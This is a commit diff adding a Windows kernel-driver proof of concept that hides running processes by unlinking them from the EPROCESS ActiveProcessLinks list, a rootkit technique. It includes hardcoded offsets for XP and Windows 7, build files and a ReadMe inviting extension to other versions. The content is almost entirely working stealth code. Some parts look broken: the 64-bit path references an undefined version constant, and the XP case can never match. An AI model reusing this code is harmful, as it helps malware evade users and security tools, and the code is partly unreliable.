updates and moves

n/a

Win32/Proof of Concepts/HideProcessUsingEPROCESS/HideProcess.c

@@ -0,0 +1,175 @@
+#ifndef CXX_HIDEPROCESS_H
+#	include "HideProcess.h"
+#endif
+
+ULONG_PTR ActiveOffsetPre =  0;
+ULONG_PTR ActiveOffsetNext = 0;
+ULONG_PTR ImageName = 0; 
+WIN_VERSION WinVersion = WINDOWS_UNKNOW;
+
+NTSTATUS
+DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath)
+{
+	DbgPrint("DriverEntry\r\n");
+
+	DriverObject->DriverUnload = UnloadDriver;
+
+	WinVersion = GetWindowsVersion();
+
+    switch(WinVersion)
+	{
+#ifdef _WIN32
+	case WINDOWS_XP:   //32Bits
+		{
+
+			ActiveOffsetPre =  0x8c;
+			ActiveOffsetNext = 0x88;
+			ImageName = 0x174; 
+			break;
+		}
+#else
+	case WINDOWS_7:   //64Bits 
+		{
+			ActiveOffsetPre =  0x190;
+			ActiveOffsetNext = 0x188;
+			ImageName = 0x2e0; 
+			break;
+		}
+#endif
+	default:
+		return STATUS_NOT_SUPPORTED;
+	}
+
+	HideProcess("explorer.exe");
+	HideProcess("notepad.exe");
+	return STATUS_SUCCESS;
+}
+
+VOID HideProcess(char* ProcessName)
+{
+	PEPROCESS CurrentProcess = NULL;
+	PEPROCESS PreProcess = NULL;
+	PLIST_ENTRY Temp = NULL;
+
+	if(!ProcessName)
+		return;
+
+	CurrentProcess = PsGetCurrentProcess();    //System  EProcess
+	PreProcess = (PEPROCESS)((ULONG_PTR)(*((ULONG_PTR*)((ULONG_PTR)CurrentProcess + ActiveOffsetPre))) - ActiveOffsetNext); 
+
+	while (CurrentProcess != PreProcess)
+	{
+	    //DbgPrint("%s\r\n",(char*)((ULONG_PTR)CurrentProcess + ImageName));
+		if(strcmp((char*)((ULONG_PTR)CurrentProcess + ImageName), ProcessName) == 0)
+		{
+			Temp = (PLIST_ENTRY)((ULONG_PTR)CurrentProcess + ActiveOffsetNext);
+
+			if (MmIsAddressValid(Temp))
+			{
+				RemoveEntryList(Temp);		
+			}
+			break;
+		}
+		
+		CurrentProcess = (PEPROCESS)((ULONG_PTR)(*((ULONG_PTR*)((ULONG_PTR)CurrentProcess + ActiveOffsetNext))) - ActiveOffsetNext);
+	}
+}
+
+VOID UnloadDriver(PDRIVER_OBJECT  DriverObject)
+{
+	DbgPrint("UnloadDriver\r\n");
+}
+
+WIN_VERSION GetWindowsVersion()
+{
+	RTL_OSVERSIONINFOEXW osverInfo = {sizeof(osverInfo)}; 
+	pfnRtlGetVersion RtlGetVersion = NULL;
+	WIN_VERSION WinVersion;
+	WCHAR szRtlGetVersion[] = L"RtlGetVersion";
+
+	RtlGetVersion = (pfnRtlGetVersion)GetFunctionAddressByName(szRtlGetVersion); 
+
+	if (RtlGetVersion)
+	{
+		RtlGetVersion((PRTL_OSVERSIONINFOW)&osverInfo); 
+	} 
+	else 
+	{
+		PsGetVersion(&osverInfo.dwMajorVersion, &osverInfo.dwMinorVersion, &osverInfo.dwBuildNumber, NULL);
+	}
+
+	//x64位支持
+	if(osverInfo.dwMajorVersion == 6 && osverInfo.dwMinorVersion == 1 && osverInfo.dwBuildNumber == 7600)
+	{
+		DbgPrint("WINDOWS 7\r\n");
+		WinVersion = WINDOWS_7_7600;
+	}
+	else if(osverInfo.dwMajorVersion == 6 && osverInfo.dwMinorVersion == 1 && osverInfo.dwBuildNumber == 7601)
+	{
+		DbgPrint("WINDOWS 7\r\n");
+		WinVersion = WINDOWS_7_7601;
+	}
+	else if(osverInfo.dwMajorVersion == 6 && osverInfo.dwMinorVersion == 2 && osverInfo.dwBuildNumber == 9200)
+	{
+		DbgPrint("WINDOWS 8\r\n");
+		WinVersion = WINDOWS_8_9200;
+	}
+	else if(osverInfo.dwMajorVersion == 6 && osverInfo.dwMinorVersion == 3 && osverInfo.dwBuildNumber == 9600)
+	{
+		DbgPrint("WINDOWS 8.1\r\n");
+		WinVersion = WINDOWS_8_9600;
+	}
+	else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 10240)
+	{
+		DbgPrint("WINDOWS 10 10240\r\n");
+		WinVersion = WINDOWS_10_10240;
+	}
+	else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 10586)
+	{
+		DbgPrint("WINDOWS 10 10586\r\n");
+		WinVersion = WINDOWS_10_10586;
+	}
+	else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 14393)
+	{
+		DbgPrint("WINDOWS 10 14393\r\n");
+		WinVersion = WINDOWS_10_14393;
+	}
+	else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 15063)
+	{
+		DbgPrint("WINDOWS 10 15063\r\n");
+		WinVersion = WINDOWS_10_15063;
+	}
+	else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 16299)
+	{
+		DbgPrint("WINDOWS 10 16299\r\n");
+		WinVersion = WINDOWS_10_16299;
+	}
+	else if(osverInfo.dwMajorVersion == 10 && osverInfo.dwMinorVersion == 0 && osverInfo.dwBuildNumber == 17134)
+	{
+		DbgPrint("WINDOWS 10 17134\r\n");
+		WinVersion = WINDOWS_10_17134;
+	}
+	else
+	{
+		DbgPrint("This is a new os\r\n");
+		WinVersion = WINDOWS_UNKNOW;
+	}
+
+	return WinVersion;
+}
+
+PVOID 
+GetFunctionAddressByName(WCHAR *wzFunction)
+{
+	UNICODE_STRING uniFunction;  
+	PVOID AddrBase = NULL;
+
+	if (wzFunction && wcslen(wzFunction) > 0)
+	{
+		RtlInitUnicodeString(&uniFunction, wzFunction);      //常量指针
+		AddrBase = MmGetSystemRoutineAddress(&uniFunction);  //在System 进程  第一个模块  Ntosknrl.exe  ExportTable
+	}
+
+	return AddrBase;
+}
+

Win32/Proof of Concepts/HideProcessUsingEPROCESS/HideProcess.h

@@ -0,0 +1,30 @@
+#ifndef CXX_HIDEPROCESS_H
+#define CXX_HIDEPROCESS_H
+
+#include <ntifs.h>
+
+typedef enum WIN_VERSION {
+	WINDOWS_XP,
+	WINDOWS_7_7600,
+	WINDOWS_7_7601,
+	WINDOWS_8_9200,
+	WINDOWS_8_9600,
+	WINDOWS_10_10240,
+	WINDOWS_10_10586,
+	WINDOWS_10_14393,
+	WINDOWS_10_15063,
+	WINDOWS_10_16299,
+	WINDOWS_10_17134,
+	WINDOWS_UNKNOW
+} WIN_VERSION;
+
+VOID UnloadDriver(PDRIVER_OBJECT  DriverObject);
+VOID HideProcess(char* ProcessName);
+
+WIN_VERSION GetWindowsVersion();
+PVOID 
+GetFunctionAddressByName(WCHAR *wzFunction);
+typedef 
+NTSTATUS 
+(*pfnRtlGetVersion)(OUT PRTL_OSVERSIONINFOW lpVersionInformation);
+#endif

Win32/Proof of Concepts/HideProcessUsingEPROCESS/HideProcess.sln

@@ -0,0 +1,16 @@
+Microsoft Visual Studio Solution File, Format Version 11.00
+# Visual Studio 2010
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HideProcess", "HideProcess.vcxproj", "{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		WinDDK|Win32 = WinDDK|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}.WinDDK|Win32.ActiveCfg = WinDDK|Win32
+		{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}.WinDDK|Win32.Build.0 = WinDDK|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

Win32/Proof of Concepts/HideProcessUsingEPROCESS/HideProcess.vcxproj

@@ -0,0 +1,64 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="WinDDK|Win32">
+      <Configuration>WinDDK</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>"HideProcess"</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='WinDDK|Win32'">
+    <TargetExt>.sys</TargetExt>
+    <GenerateManifest>false</GenerateManifest>
+    <ExecutablePath>$(WLHBASE)\bin\x86\x86;$(WLHBASE)\bin\x86</ExecutablePath>
+    <IncludePath>$(WLHBASE)\inc\api;$(WLHBASE)\inc\crt;$(WLHBASE)\inc\ddk;$(WLHBASE)\inc</IncludePath>
+    <ReferencePath />
+    <LibraryPath>$(WLHBASE)\lib\win7\i386</LibraryPath>
+    <SourcePath />
+    <ExcludePath />
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='WinDDK|Win32'">
+    <ClCompile>
+      <PreprocessorDefinitions>_X86_;DBG=1</PreprocessorDefinitions>
+      <ExceptionHandling>false</ExceptionHandling>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <CallingConvention>StdCall</CallingConvention>
+      <CompileAs>CompileAsC</CompileAs>
+      <AdditionalIncludeDirectories>
+      </AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>ntoskrnl.lib;hal.lib;wdm.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+    <Link>
+      <IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries>
+      <SubSystem>Native</SubSystem>
+      <Driver>Driver</Driver>
+      <EntryPointSymbol>DriverEntry</EntryPointSymbol>
+      <SetChecksum>true</SetChecksum>
+      <BaseAddress>0x10000</BaseAddress>
+      <RandomizedBaseAddress>
+      </RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include=".\HideProcess.c" />
+    <ClCompile Include=".\HideProcess.h" />
+    <ClCompile Include=".\struct.h" />
+    <ClCompile Include=".\common.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

Win32/Proof of Concepts/HideProcessUsingEPROCESS/ReadMe.txt

@@ -0,0 +1,2 @@
+HideProcess by Remove ProcessList in EPROCESS struct.
+Support Windows xp and windows 7 OS, you can add other os's offset of ProcessList in EPROCESS to support more.

Win32/Proof of Concepts/HideProcessUsingEPROCESS/common.h

@@ -0,0 +1,69 @@
+/**************************************************************************************
+* AUTHOR : MZ
+* DATE   : 2016-8-29
+* MODULE : common.h
+*
+* Command: 
+*	IOCTRL Common Header
+*
+* Description:
+*	Common data for the IoCtrl driver and application
+*
+****************************************************************************************
+* Copyright (C) 2010 MZ.
+****************************************************************************************/
+
+#pragma once 
+
+//#######################################################################################
+// D E F I N E S
+//#######################################################################################
+
+#if DBG
+#define dprintf DbgPrint
+#else
+#define dprintf
+#endif
+
+//不支持符号链接用户相关性
+#define DEVICE_NAME                  L"\\Device\\devHideProcess"             // Driver Name
+#define SYMBOLIC_LINK_NAME           L"\\DosDevices\\HideProcess"            // Symbolic Link Name
+#define WIN32_LINK_NAME              "\\\\.\\HideProcess"                    // Win32 Link Name
+
+//支持符号链接用户相关性
+#define SYMBOLIC_LINK_GLOBAL_NAME    L"\\DosDevices\\Global\\HideProcess"    // Symbolic Link Name
+
+#define DATA_TO_APP                  "Hello World from Driver"
+
+//
+// Device IO Control Codes
+//
+#define IOCTL_BASE          0x800
+#define MY_CTL_CODE(i)        \
+    CTL_CODE                  \
+    (                         \
+        FILE_DEVICE_UNKNOWN,  \
+        IOCTL_BASE + i,       \
+        METHOD_BUFFERED,      \
+        FILE_ANY_ACCESS       \
+    )
+
+#define IOCTL_HELLO_WORLD            MY_CTL_CODE(0)
+#define IOCTRL_REC_FROM_APP          MY_CTL_CODE(1)
+#define IOCTRL_SEND_TO_APP           MY_CTL_CODE(2)
+
+
+//
+// TODO: Add your IOCTL define here
+//
+
+
+
+//
+// TODO: Add your struct,enum(public) define here
+//
+
+
+
+/* EOF */
+

Win32/Proof of Concepts/HideProcessUsingEPROCESS/sources

@@ -0,0 +1,9 @@
+TARGETNAME=HideProcess
+#TARGETPATH=$(BASEDIR)\lib
+TARGETPATH=obj
+TARGETTYPE=DRIVER
+
+INCLUDES=.\
+
+SOURCES=HideProcess.c
+

Win32/Proof of Concepts/HideProcessUsingEPROCESS/struct.h

@@ -0,0 +1,407 @@
+/***************************************************************************************
+* AUTHOR : MZ
+* DATE   : 2016-8-29
+* MODULE : struct.h
+* 
+* Command: 
+*   驱动的头文件
+*
+* Description:
+*   定义一些常量,避免重复劳动; 您可以在此添加需要的函数/结构体
+*
+****************************************************************************************
+
+Copyright (C) 2010 MZ.
+****************************************************************************************/
+
+#pragma once
+
+#include <ntddk.h> 
+
+typedef long LONG;
+typedef unsigned char  BOOL, *PBOOL;
+typedef unsigned char  BYTE, *PBYTE;
+typedef unsigned long  DWORD, *PDWORD;
+typedef unsigned short WORD, *PWORD;
+
+typedef void  *HMODULE;
+typedef long NTSTATUS, *PNTSTATUS;
+typedef unsigned long DWORD;
+typedef DWORD * PDWORD;
+typedef unsigned long ULONG;
+typedef unsigned long ULONG_PTR;
+typedef ULONG *PULONG;
+typedef unsigned short WORD;
+typedef unsigned char BYTE; 
+typedef unsigned char UCHAR;
+typedef unsigned short USHORT;
+typedef void *PVOID;
+typedef BYTE BOOLEAN;
+#define SEC_IMAGE    0x01000000
+
+//----------------------------------------------------
+
+//  PEB
+   
+#pragma pack(4)
+typedef struct _PEB_LDR_DATA
+{
+	ULONG Length;
+	BOOLEAN Initialized;
+	PVOID SsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+	LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+} PEB_LDR_DATA, *PPEB_LDR_DATA;
+#pragma pack() 
+
+typedef struct _PEB_ORIG {
+    BYTE Reserved1[2];
+    BYTE BeingDebugged;
+    BYTE Reserved2[229];
+    PVOID Reserved3[59];
+    ULONG SessionId;
+} PEB_ORIG, *PPEB_ORIG;
+
+typedef void (*PPEBLOCKROUTINE)(PVOID PebLock);
+
+struct _PEB_FREE_BLOCK {
+	struct _PEB_FREE_BLOCK *Next;
+	ULONG Size;
+};
+typedef struct _PEB_FREE_BLOCK PEB_FREE_BLOCK;
+typedef struct _PEB_FREE_BLOCK *PPEB_FREE_BLOCK;
+
+typedef struct _RTL_DRIVE_LETTER_CURDIR {
+	USHORT Flags;
+	USHORT Length;
+	ULONG TimeStamp;
+	UNICODE_STRING DosPath;
+} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
+
+typedef struct _RTL_USER_PROCESS_PARAMETERS {
+	ULONG MaximumLength;
+	ULONG Length;
+	ULONG Flags;
+	ULONG DebugFlags;
+	PVOID ConsoleHandle;
+	ULONG ConsoleFlags;
+	HANDLE StdInputHandle;
+	HANDLE StdOutputHandle;
+	HANDLE StdErrorHandle;
+	UNICODE_STRING CurrentDirectoryPath;
+	HANDLE CurrentDirectoryHandle;
+	UNICODE_STRING DllPath;
+	UNICODE_STRING ImagePathName;
+	UNICODE_STRING CommandLine;
+	PVOID Environment;
+	ULONG StartingPositionLeft;
+	ULONG StartingPositionTop;
+	ULONG Width;
+	ULONG Height;
+	ULONG CharWidth;
+	ULONG CharHeight;
+	ULONG ConsoleTextAttributes;
+	ULONG WindowFlags;
+	ULONG ShowWindowFlags;
+	UNICODE_STRING WindowTitle;
+	UNICODE_STRING DesktopName;
+	UNICODE_STRING ShellInfo;
+	UNICODE_STRING RuntimeData;
+	RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
+} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
+
+typedef struct _PEB {
+	BOOLEAN InheritedAddressSpace;
+	BOOLEAN ReadImageFileExecOptions;
+	BOOLEAN BeingDebugged;
+	BOOLEAN Spare;
+	HANDLE Mutant;
+	PVOID ImageBaseAddress;
+	PPEB_LDR_DATA LoaderData;
+	PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
+	PVOID SubSystemData;
+	PVOID ProcessHeap;
+	PVOID FastPebLock;
+	PPEBLOCKROUTINE FastPebLockRoutine;
+	PPEBLOCKROUTINE FastPebUnlockRoutine;
+	ULONG EnvironmentUpdateCount;
+	PVOID *KernelCallbackTable;
+	PVOID EventLogSection;
+	PVOID EventLog;
+	PPEB_FREE_BLOCK FreeList;
+	ULONG TlsExpansionCounter;
+	PVOID TlsBitmap;
+	ULONG TlsBitmapBits[0x2];
+	PVOID ReadOnlySharedMemoryBase;
+	PVOID ReadOnlySharedMemoryHeap;
+	PVOID *ReadOnlyStaticServerData;
+	PVOID AnsiCodePageData;
+	PVOID OemCodePageData;
+	PVOID UnicodeCaseTableData;
+	ULONG NumberOfProcessors;
+	ULONG NtGlobalFlag;
+	BYTE Spare2[0x4];
+	LARGE_INTEGER CriticalSectionTimeout;
+	ULONG HeapSegmentReserve;
+	ULONG HeapSegmentCommit;
+	ULONG HeapDeCommitTotalFreeThreshold;
+	ULONG HeapDeCommitFreeBlockThreshold;
+	ULONG NumberOfHeaps;
+	ULONG MaximumNumberOfHeaps;
+	PVOID **ProcessHeaps;
+	PVOID GdiSharedHandleTable;
+	PVOID ProcessStarterHelper;
+	PVOID GdiDCAttributeList;
+	PVOID LoaderLock;
+	ULONG OSMajorVersion;
+	ULONG OSMinorVersion;
+	ULONG OSBuildNumber;
+	ULONG OSPlatformId;
+	ULONG ImageSubSystem;
+	ULONG ImageSubSystemMajorVersion;
+	ULONG ImageSubSystemMinorVersion;
+	ULONG GdiHandleBuffer[0x22];
+	ULONG PostProcessInitRoutine;
+	ULONG TlsExpansionBitmap;
+	BYTE TlsExpansionBitmapBits[0x80];
+	ULONG SessionId;
+} PEB, *PPEB;
+
+typedef struct _SYSTEM_PROCESS_INFORMATION {
+    ULONG NextEntryOffset;
+    ULONG NumberOfThreads;
+    LARGE_INTEGER SpareLi1;
+    LARGE_INTEGER SpareLi2;
+    LARGE_INTEGER SpareLi3;
+    LARGE_INTEGER CreateTime;
+    LARGE_INTEGER UserTime;
+    LARGE_INTEGER KernelTime;
+    UNICODE_STRING ImageName;
+    KPRIORITY BasePriority;
+    HANDLE UniqueProcessId;
+    HANDLE InheritedFromUniqueProcessId;
+    ULONG HandleCount;
+    ULONG SpareUl2;
+    ULONG SpareUl3;
+    ULONG PeakVirtualSize;
+    ULONG VirtualSize;
+    ULONG PageFaultCount;
+    ULONG PeakWorkingSetSize;
+    ULONG WorkingSetSize;
+    ULONG QuotaPeakPagedPoolUsage;
+    ULONG QuotaPagedPoolUsage;
+    ULONG QuotaPeakNonPagedPoolUsage;
+    ULONG QuotaNonPagedPoolUsage;
+    ULONG PagefileUsage;
+    ULONG PeakPagefileUsage;
+    ULONG PrivatePageCount;
+} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
+
+typedef struct _SYSTEM_THREAD_INFORMATION {
+    LARGE_INTEGER KernelTime;
+    LARGE_INTEGER UserTime;
+    LARGE_INTEGER CreateTime;
+    ULONG WaitTime;
+    PVOID StartAddress;
+    CLIENT_ID ClientId;
+    KPRIORITY Priority;
+    LONG BasePriority;
+    ULONG ContextSwitches;
+    ULONG ThreadState;
+    ULONG WaitReason;
+} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;
+
+struct _SYSTEM_THREADS
+{
+	LARGE_INTEGER		KernelTime;
+	LARGE_INTEGER		UserTime;
+	LARGE_INTEGER		CreateTime;
+	ULONG				WaitTime;
+	PVOID				StartAddress;
+	CLIENT_ID			ClientIs;
+	KPRIORITY			Priority;
+	KPRIORITY			BasePriority;
+	ULONG				ContextSwitchCount;
+	ULONG				ThreadState;
+	KWAIT_REASON		WaitReason;
+};
+
+struct _SYSTEM_PROCESSES
+{
+	ULONG				NextEntryDelta;
+	ULONG				ThreadCount;
+	ULONG				Reserved[6];
+	LARGE_INTEGER		CreateTime;
+	LARGE_INTEGER		UserTime;
+	LARGE_INTEGER		KernelTime;
+	UNICODE_STRING		ProcessName;
+	KPRIORITY			BasePriority;
+	ULONG				ProcessId;
+	ULONG				InheritedFromProcessId;
+	ULONG				HandleCount;
+	ULONG				Reserved2[2];
+	VM_COUNTERS			VmCounters;
+	IO_COUNTERS			IoCounters; //windows 2000 only
+	struct _SYSTEM_THREADS	Threads[1];
+};
+
+typedef struct _HANDLE_TABLE_ENTRY_INFO
+{
+    ULONG AuditMask;
+} HANDLE_TABLE_ENTRY_INFO, *PHANDLE_TABLE_ENTRY_INFO;
+
+typedef struct _HANDLE_TABLE_ENTRY
+{
+    union
+    {
+        PVOID Object;
+        ULONG_PTR ObAttributes;
+        PHANDLE_TABLE_ENTRY_INFO InfoTable;
+        ULONG_PTR Value;
+    };
+    union
+    {
+        ULONG GrantedAccess;
+        struct
+        {
+            USHORT GrantedAccessIndex;
+            USHORT CreatorBackTraceIndex;
+        };
+        LONG NextFreeTableEntry;
+    };
+} HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY;
+
+typedef struct _HANDLE_TABLE
+{
+    ULONG TableCode;
+    PEPROCESS QuotaProcess;
+    PVOID UniqueProcessId;
+    ULONG HandleTableLock[4];
+    LIST_ENTRY HandleTableList;
+    ULONG HandleContentionEvent;
+    PVOID DebugInfo;
+    LONG ExtraInfoPages;
+    ULONG FirstFree;
+    ULONG LastFree;
+    ULONG NextHandleNeedingPool;
+    LONG HandleCount;
+    union
+    {
+        ULONG Flags;
+        UCHAR StrictFIFO:1;
+    };
+} HANDLE_TABLE, *PHANDLE_TABLE;
+
+typedef struct _OBJECT_TYPE_INITIALIZER {
+	USHORT Length;
+	BOOLEAN UseDefaultObject;
+	BOOLEAN CaseInsensitive;
+	ULONG InvalidAttributes;
+	GENERIC_MAPPING GenericMapping;
+	ULONG ValidAccessMask;
+	BOOLEAN SecurityRequired;
+	BOOLEAN MaintainHandleCount;
+	BOOLEAN MaintainTypeList;
+	POOL_TYPE PoolType;
+	ULONG DefaultPagedPoolCharge;
+	ULONG DefaultNonPagedPoolCharge;
+	PVOID DumpProcedure;
+	PVOID OpenProcedure;
+	PVOID CloseProcedure;
+	PVOID DeleteProcedure;
+	PVOID ParseProcedure;
+	PVOID SecurityProcedure;
+	PVOID QueryNameProcedure;
+	PVOID OkayToCloseProcedure;
+} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;
+
+
+typedef struct _OBJECT_TYPE {
+	ERESOURCE Mutex;
+	LIST_ENTRY TypeList;
+	UNICODE_STRING Name;            // Copy from object header for convenience
+	PVOID DefaultObject;
+	ULONG Index;
+	ULONG TotalNumberOfObjects;
+	ULONG TotalNumberOfHandles;
+	ULONG HighWaterNumberOfObjects;
+	ULONG HighWaterNumberOfHandles;
+	OBJECT_TYPE_INITIALIZER TypeInfo;
+	ULONG Key;
+	ERESOURCE ObjectLocks[4];
+} OBJECT_TYPE, *POBJECT_TYPE;
+
+typedef struct _OBJECT_DIRECTORY {
+    struct _OBJECT_DIRECTORY_ENTRY *HashBuckets[ 37 ];
+    ULONG Lock;
+    PVOID DeviceMap;
+    ULONG SessionId;
+	USHORT Reserved;
+	USHORT SymbolicLinkUsageCount;
+} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;
+
+/*
+typedef enum _KAPC_ENVIRONMENT {
+  OriginalApcEnvironment,
+  AttachedApcEnvironment,
+  CurrentApcEnvironment,
+  InsertApcEnvironment
+} KAPC_ENVIRONMENT;
+*/
+
+typedef enum
+{
+    OriginalApcEnvironment,
+	AttachedApcEnvironment,
+	CurrentApcEnvironment
+} KAPC_ENVIRONMENT;
+
+//----------------------------------------------------
+
+NTSYSAPI
+NTSTATUS
+NTAPI ZwQuerySystemInformation(
+							   IN ULONG SystemInformationClass,
+							   IN PVOID SystemInformation,
+							   IN ULONG SystemInformationLength,
+							   OUT PULONG ReturnLength);
+
+
+
+NTSTATUS
+  NtOpenFile(
+    OUT PHANDLE  FileHandle,
+    IN ACCESS_MASK  DesiredAccess,
+    IN POBJECT_ATTRIBUTES  ObjectAttributes,
+    OUT PIO_STATUS_BLOCK  IoStatusBlock,
+    IN ULONG  ShareAccess,
+    IN ULONG  OpenOptions
+    );
+
+NTSTATUS 
+ZwOpenProcess(
+   OUT PHANDLE ProcessHandle, 
+   IN ACCESS_MASK DesiredAccess, 
+   IN POBJECT_ATTRIBUTES ObjectAttributes, 
+   IN PCLIENT_ID ClientId
+   );
+
+NTSTATUS
+PsLookupProcessByProcessId(
+    IN HANDLE ProcessId,
+    OUT PEPROCESS *Process
+    );
+
+HANDLE
+  PsGetProcessId(
+    IN PEPROCESS  Process
+    );
+
+NTSTATUS
+RtlFormatCurrentUserKeyPath(
+    OUT PUNICODE_STRING CurrentUserKeyPath
+    );
+
+VOID KeAttachProcess( PEPROCESS proc );
+VOID KeDetachProcess();